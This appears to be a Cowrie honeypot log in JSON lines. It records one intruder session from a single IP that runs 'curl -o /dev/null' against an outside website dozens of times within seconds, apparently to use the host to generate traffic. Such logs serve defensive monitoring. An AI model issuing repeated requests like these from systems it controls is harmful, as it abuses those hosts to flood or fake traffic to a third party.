{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.746723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.792206Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.793197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.831048Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.832050Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.870336Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.871656Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.913027Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.914124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.954827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.955997Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:30.993310Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:30.994595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.036518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.037867Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.079205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.080396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.122902Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.123949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.163069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.164372Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.201711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.202602Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.239804Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.240802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.285742Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.286864Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.326284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.327396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.374245Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.375413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.415923Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.416922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.455371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.456722Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.497768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.499160Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.541381Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.542413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.587214Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.588316Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.633609Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.635032Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.724438Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.725646Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.764467Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.765484Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.803167Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.804577Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.841143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.842111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.880506Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.881580Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.924568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.925933Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:31.964763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:31.965916Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.005240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.006262Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.068089Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.069417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.107309Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.108413Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.149498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.150743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.191852Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.193797Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.230853Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.231994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.275979Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.277069Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.314451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.315807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.355461Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.356425Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.400436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.401699Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.439483Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.440778Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.487023Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.488396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.526747Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.527754Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.567362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.568632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.624758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.625889Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.674352Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.675451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.715569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.716929Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.753716Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.754752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.791666Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.792637Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.846087Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.847648Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.888958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.890133Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.928788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.929758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:32.971128Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:32.972521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.009651Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.010823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.089496Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.090562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.129687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.131212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.172890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.174075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.210992Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.211968Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.249149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.250446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.288789Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.289895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.327883Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.328949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.371044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.372389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.411900Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.412691Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.449657Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.450811Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.488489Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.489861Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:33.528749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:33.529795Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
